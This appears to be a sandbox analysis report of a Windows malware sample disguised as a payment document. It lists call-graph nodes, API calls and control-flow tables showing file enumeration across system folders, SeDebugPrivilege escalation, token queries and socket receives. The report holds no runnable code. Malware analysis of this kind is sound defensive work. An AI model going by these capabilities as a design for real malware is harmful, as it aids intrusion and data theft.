8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 CloseHandle 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9685 404d04 9678->9685 9679 404dcc 9680 404a39 5 API calls 9679->9680 9680->9676 9681 404dc6 9682 402bab 2 API calls 9681->9682 9682->9679 9683 402b7c 2 API calls 9683->9685 9684 404b8f 5 API calls 9684->9685 9685->9679 9685->9681 9685->9683 9685->9684 9686 404a39 5 API calls 9685->9686 9687 405b6f 6 API calls 9685->9687 9688 404cbf 8 API calls 9685->9688 9689 402bab GetProcessHeap HeapFree 9685->9689 9686->9685 9687->9685 9688->9685 9689->9685 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9694 404cbf 8 API calls 9692->9694 9702 40f115 9692->9702 9693 41219c 14 API calls 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9702 9702->9693

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                APIs
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$FirstNext
                • String ID: %s\%s$%s\*$Program Files$Windows
                • API String ID: 1690352074-2009209621
                • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                • String ID: SeDebugPrivilege
                • API String ID: 3615134276-2896544425
                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                APIs
                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateProcess
                • String ID:
                • API String ID: 1357844191-0
                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                APIs
                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: recv
                • String ID:
                • API String ID: 1507349165-0
                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                • _wmemset.LIBCMT ref: 00406244
                • _wmemset.LIBCMT ref: 00406261
